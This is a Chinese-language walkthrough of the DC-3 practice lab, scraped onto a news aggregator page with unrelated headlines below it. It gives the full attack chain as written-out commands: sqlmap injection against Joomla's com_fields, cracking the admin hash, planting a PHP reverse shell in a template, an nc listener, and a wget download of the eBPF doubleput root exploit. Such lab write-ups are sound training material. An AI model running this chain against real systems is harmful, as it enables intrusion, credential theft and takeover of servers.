DC-3 实验步骤
【资料图】
DC-3靶机位置:
/entry/dc-32,312/
大家自行解压,然后vmware导入,记得修改网卡为NAT。
nmap
netdiscovery
arp-scan
本例中靶机IP为
#nmap -A
从下面的结果
http-generator: Joomla! - Open Source Content Management
可以看到JOOMLA CMS
使用浏览器打开该网页
并且上网查询joomla,我们知道,默认会有一个文件在web下,直接浏览器打开,
打开之后,我们可以看到joomla 的版本为
使用joomscan也可以扫描出网站的版本(需要额外联网安装,大家课后可以尝试)
joomscan --url
#searchsploit joomla
Joomla! - 'com_fields' SQL Injection | php/webapps/
使用文件对DC-3进行爆破。
我们接下来看一下的内容
#searchsploit -m 42033
#cat
阅读内容,里面介绍了sql 注入获取权限的方法。
# sqlmap -u "&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
扫描结果列出了5个数据库
# sqlmap -u "&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables –batch
通过joomladb库找到了#_users表
# sqlmap -u "&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch
我们得到密码 $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
但这段密码是加过密的,需要解密
写入hash值到
#echo "\$2y\$10\$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu" >
使用john进行爆破获取密码为snoopy
#john
/
username: admin
password: snoopy
大家探索下该网站,也可以用工具扫描网站的目录结构
# nikto -host
通过增加恶意php 代码来实现反弹shell, 代码在下面目录中:
/usr/share/webshells/php/
我们要修改的页面为/templates/beez3/html/
(beez3 template)
参考链接为:
/administrator/&view=template&id=503&file=L2h0bWwvbW9kdWxlcy5waHA%3D
将/usr/share/webshells/php/
里的内容贴进去,如果不知道如何插入,可以先删除里的内容,然后再替换。
最后修改如下一行的内容:
$ip = ''; // CHANGE THIS
修改IP为Kali linux的地址。
此时在kali的命令行中输入:
nc -lvp 1234
然后再浏览器中输入:
/templates/beez3/html/
再单击链接即可。
此时kali的提示符已发生变化,由lisetening变为了$:
#######
注意
#########
保留该界面,我们在
章节提到的部分需要继续在这里
python -c 'import pty;("/bin/bash")'
uname -a
lsb_release –a
查找漏洞
searchsploit -w Ubuntu
39772漏洞利用文件下载地址
/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/
该文件老师已推送给大家。
大家需要用sftp上传到kali的/var/www/html
上传先需要开启ssh服务
#service ssh start
然后开启kali的apache2服务
#service apache2 start
我们回到 的命令行界面(靶机的交互界面)
cd /tmp
wget
unzip
ls
cd 39772
ls
tar -xvf
ls
cd ebpf_mapfd_doubleput_exploit
ls
./
ls
./doubleput
cd root
ls
cat
标签:
上一篇 : 新一轮老旧汽车“以旧换新”补贴来了!来看我市搞活汽车流通若干措施
下一篇 : 最后一页
最新推荐
DC-3实验步骤DC-3靶机位置:https: www vulnhub com entry dc-32,312
市商务委介绍,为推动我市汽车消费市场升级转型,现就加快老旧汽车淘汰
1、《月光曲》是阿希尔-克洛德·德彪西的作品。2、《月光》隶属于《贝
1、要吃苹果,都是他来按住削皮器,细细削皮;要看书,都是他和食指合作翻
,你们好,今天0471房产来聊聊一篇樱线,樱线简述的文章,网友们对这件
截至2023年9月8日收盘,耐普矿机(300818)报收于29 16元,上涨1 89%,换
广州2宗地块触顶待摇号总成交价近139亿元,触顶,摇号,配建,成交价,起始
世预赛南美区首轮阿根廷坐镇主场迎战厄瓜多尔。比赛第76分钟,梅西任意
今天锅盖头来为大家解答以上问题,rgp隐形眼镜的优缺点,远视隐形眼镜
她13岁嫁皇帝,26岁竟靠抽签当上皇后,一生扶持了3位皇帝,看完后不要急
单位数额在500万元以上的,应当认定为“数额特别巨大”。数额巨大或者
2023年秋季学期,深圳市高校课程互选学分互认工作全新升级,全市17所主
截至2023年9月8日收盘,陕西煤业(601225)报收于18 15元,下跌1 04%,换
1、基于此平台,马自达伊瑞在高级感、驾驶便利性、动力性、安全性、燃
小米汽车计划在2024年正式量产,目前该车正在接受全面的生产线设备、工
增加新研究证据、更新流感防控有关政策和措施、更新2023至2024年度国内
原标题:巴西南里奥格兰德州暴雨灾害遇难人数升至41人巴西南部南里奥格
乐居财经李礼9月8日,据上交所,“河南省郑州新区建设投资有限公司2023
被误解26年,它才是影史最吓人港片
数据显示,2023年上半年,比亚迪新能源汽车市占率进一步扩大至33 5%,
刘敬宇介绍,2022年,公司投资兴建年产万吨的国内先进的泡菜生产线,购
昨日上午,正泰高效光伏电池、组件生产基地及分布式电站项目首片光伏电
8月31日,华富强化回报债券(LOF)最新单位净值为1 694元,累计净值为2 1
,你们好,今天0471房产来聊聊一篇世峰,世峰简述的文章,网友们对这件
8月30日易居企业发布2023年中期业绩报告报告期内实现总收入2299亿元同
天气渐凉,酷热的暑气消散,秋天的感觉渐渐来了,出门走走逛逛总算能舒
1、使用较多的转移印花方法是利用分散染料在合成纤维织物上用干法转移
IT之家8月31日消息,亚马逊发行的MMORPG游戏《王权与自由》宣布将于9月
网络游戏板块跌1 11%名臣健康涨3 38%居首---中国经济网北京8月31日讯今
图 ic文|资深企业法务吴海燕近日,公司法修订草案三审稿提请十四届全国
社保卡具有社会保障功能和金融功能,社保待遇信息查询可通过社保窗口、
以下是豫能控股在北京时间8月31日13:10分盘口异动快照:8月31日13点10
同花顺(300033)金融研究中心8月31日讯,有投资者向海辰药业(300584)
为了普及科学知识,激发学生的科学兴趣,培养学生的科学创新意识,体验
纳指涨0 54%英伟达涨1%苹果涨1 9%拼多多涨5 3%
格隆汇8月31日丨根据联交所最新权益披露资料显示,2023年8月24日,泰格
“亚运热”带火体育旅游每日商报讯距离杭州亚运会开幕式还有三周,浙江
火速响应最新减持要求!深市多家上市公司股东终止减持计划。与此同时,
1、尽量避免携带贵重物品,不要将钱包、手机放在上衣口袋等容易暴露的
每经AI快讯,昇辉科技(SZ300423,收盘价:9 41元)8月30日晚间发布半
导读1、prerequisite英[ˌpri:ˈrekwəzɪt]美[priˈrɛkwɪzɪt] n 先决条件
据财政部网站8月30日消息,财政部、海关总署、税务总局发布关于延续实
“路桥发布”微信公众号消息,8月30日3时41分,浙江台州路桥区横街镇前
【环球网报道见习记者姜蔼玲】据韩联社30日报道,韩国总统尹锡悦日前将
每经AI快讯,有投资者在投资者互动平台提问:董秘你好!公司之前回复投
1、莱西市财政局是莱西市人民政府工作部门。本文关于莱西市财政局的简
今天来聊聊动挡汽车如何刹车不熄火,手动挡汽车如何刹车的文章,现在就
自《天下3》捏脸系统迭代升级以来,少侠们借助新的功能已经在大荒创造
直播吧8月30日讯Opta统计了本赛季英超非门将球员的成功长传次数,并列
科技日报讯(记者王怡)日前,记者从中国计量测试学会获悉,最新数据显
成都抗疫的外籍志愿者:愿为城市“康复”贡献力量
无视一切申请必下款的口子不存在,但可以看看十个门槛低好下款的平台
万物云朱保全谈物企独立性:好皮囊是父母生的,好身体是自己练的
近一半的心理健康从业者表示 他们没有准备好帮助客户应对气候变化
广东公安强力开展全省第四次夏夜治安巡查宣防集中统一行动 抓获违法犯罪嫌疑人8373人
今日华为g5100010百度百科(华为G510怎么样值不值得买好吗华为G510多少钱)
拥有100万存款是什么概念?我国存款达到100万的人多吗?答
历史上商纣王酒池肉林真的存在吗(历史上商纣王酒池肉林是否存在)
半斤机再见iPhone15 ProMax被曝减重成功:手感更好了
恐怖黎明 | 1.1.9.8酸毒大剑无CD刃爆 苦修士(夜刃+守誓) 降配增伤 酸毒一线强 文字版
封神宇宙顺势而起!哪吒登场只是开胃菜,或将早出第二个漫威宇宙
今日三星i9001如何恢复出厂设置(三星I9000机怎么恢复出厂设置)
Copyright © 2015-2023 京津冀律师网版权所有 备案号:京ICP备2022022245号-12 联系邮箱:434 922 62 @qq.com